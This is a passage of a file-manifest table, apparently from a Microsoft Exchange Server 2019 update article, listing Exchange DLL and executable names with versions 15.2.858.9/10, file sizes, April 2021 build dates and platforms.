\nMicrosoft.exchange.clients.strings.dll| 15.2.858.9| 924,552| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.858.10| 31,624| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.858.9| 52,112| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.858.10| 33,664| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.858.10| 3,515,288| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.858.9| 108,416| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.858.10| 288,648| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.858.9| 625,544| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.858.9| 86,408| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.858.9| 1,830,288| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.858.9| 466,328| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.858.10| 25,984| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.858.9| 38,288| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.858.9| 102,800| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.858.9| 48,520| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.858.9| 67,480| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.common.dll| 15.2.858.9| 172,936| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.858.9| 113,544| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.il.dll| 15.2.858.9| 13,720| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.858.9| 63,872| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.858.9| 15,248| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.common.search.dll| 15.2.858.9| 108,928| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.858.9| 51,584| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.858.9| 36,744| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.858.9| 27,512| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.858.9| 1,042,304| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.858.9| 29,072| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.858.10| 181,128| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.858.9| 30,088| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.858.9| 22,392| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.858.9| 85,912| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.compliance.dll| 15.2.858.9| 41,368| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.858.9| 37,240| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.858.10| 50,560| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.858.10| 33,176| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.858.10| 1,100,160| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.858.10| 206,744| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.858.10| 210,840| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.compression.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.858.9| 37,784| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.858.9| 145,800| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.858.9| 14,224| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.858.9| 53,128| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.858.9| 23,448| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.858.9| 13,208| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.858.9| 54,680| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.858.10| 1,846,152| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.858.9| 30,104| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.858.9| 68,496| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.858.9| 21,376| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.858.9| 25,984| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.858.9| 169,856| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.858.9| 330,136| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.858.9| 173,960| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.858.9| 71,048| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.858.9| 203,672| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.context.client.dll| 15.2.858.9| 27,008| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.858.9| 51,592| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.context.core.dll| 15.2.858.9| 51,080| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.858.9| 46,984| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.858.9| 1,093,520| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.858.9| 57,240| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.858.9| 326,536| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.858.9| 3,354,504| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.858.9| 35,728| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.858.9| 165,248| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.858.9| 619,384| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.858.9| 7,792,016| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.858.9| 80,280| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.data.dll| 15.2.858.9| 1,790,360| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.858.10| 1,626,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.858.9| 375,192| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.858.9| 105,352| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.858.9| 224,632| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.858.9| 186,752| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.858.9| 39,832| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.858.9| 119,176| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.858.9| 968,072| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.858.9| 141,184| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.858.9| 769,416| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.858.9| 139,640| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.858.9| 56,720| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.858.9| 453,008| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.858.9| 32,632| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.858.9| 256,912| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.858.9| 11,816,840| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.858.9| 37,768| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.858.9| 655,768| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.858.9| 175,488| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.858.9| 36,240| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.858.9| 14,224| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.858.10| 72,600| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.858.9| 13,176| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.858.9| 22,912| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.858.9| 2,213,272| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.858.9| 2,213,272| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.858.9| 23,936| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.858.9| 546,696| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.858.9| 215,416| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.858.9| 194,440| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.858.9| 146,296| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.858.9| 27,512| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.858.9| 13,696| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.858.10| 49,536| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.858.9| 28,024| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.858.9| 208,792| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.858.9| 88,984| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.858.9| 32,664| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.858.10| 45,952| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.858.10| 18,840| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.858.9| 473,464| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.858.9| 206,224| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.858.10| 36,744| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.858.9| 131,464| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.858.9| 21,896| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.858.9| 148,360| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.858.9| 220,032| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.858.9| 23,944| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.858.9| 97,664| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.858.9| 1,266,048| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.858.9| 1,266,048| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,508| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.858.9| 87,416| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,495| 04-Apr-2021| 08:32| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.858.9| 52,104| 04-Apr-2021| 08:33| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.858.10| 292,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.858.10| 73,112| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.858.9| 45,976| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.858.10| 218,504| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.858.9| 78,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.858.9| 35,704| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.858.10| 935,296| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.858.9| 336,264| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.858.9| 52,616| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.858.9| 32,128| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.858.9| 854,400| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.858.10| 291,736| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.858.9| 39,320| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.858.10| 76,184| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.858.10| 166,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.858.10| 1,486,736| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.858.10| 122,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.858.10| 12,327,320| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.858.9| 264,072| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.858.9| 37,760| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.858.10| 186,776| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.858.10| 64,384| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.858.10| 83,856| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.858.9| 63,864| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.858.9| 100,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.858.9| 144,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.858.10| 270,208| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.858.9| 15,760| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.858.9| 254,336| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.858.10| 37,256| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.858.9| 640,904| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.858.9| 37,272| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.858.10| 146,328| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:31| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.858.10| 595,840| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.858.10| 30,104| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.858.9| 99,720| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.858.9| 42,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.858.10| 40,344| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.858.10| 54,152| 04-Apr-2021| 08:41| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.858.9| 164,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.858.10| 58,768| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.858.9| 204,168| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.858.10| 30,600| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.858.10| 38,792| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.858.10| 48,520| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.858.9| 180,608| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.858.10| 36,736| 04-Apr-2021| 08:41| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.858.10| 25,992| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.858.10| 1,868,184| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.858.9| 54,680| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.858.10| 35,720| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.858.9| 35,736| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.858.9| 18,312| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.858.9| 18,312| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.858.9| 263,040| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.858.9| 263,040| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.858.9| 24,960| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.858.9| 24,960| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.858.9| 53,128| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.858.9| 216,960| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.858.10| 32,152| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.858.10| 281,984| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.858.10| 83,848| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.858.9| 94,088| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.858.10| 1,840,536| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.858.9| 71,552| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.858.10| 175,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.858.9| 159,616| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.858.9| 51,080| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.858.9| 32,136| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.858.9| 100,248| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.858.10| 271,248| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.858.9| 22,408| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.858.9| 33,680| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.858.9| 18,328| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.858.9| 27,536| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.858.9| 30,608| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.858.9| 22,400| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.858.9| 66,456| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.858.9| 29,592| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.858.9| 20,352| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.858.9| 34,184| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.858.9| 103,800| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.858.9| 15,760| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.858.9| 20,872| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.858.9| 16,264| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.858.9| 49,040| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.858.9| 44,424| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.858.9| 38,296| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.858.9| 10,375,064| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.858.9| 29,056| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.858.9| 21,384| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.858.9| 24,456| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.858.9| 89,496| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.858.9| 20,864| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.858.9| 26,512| 04-Apr-2021| 08:31| x86 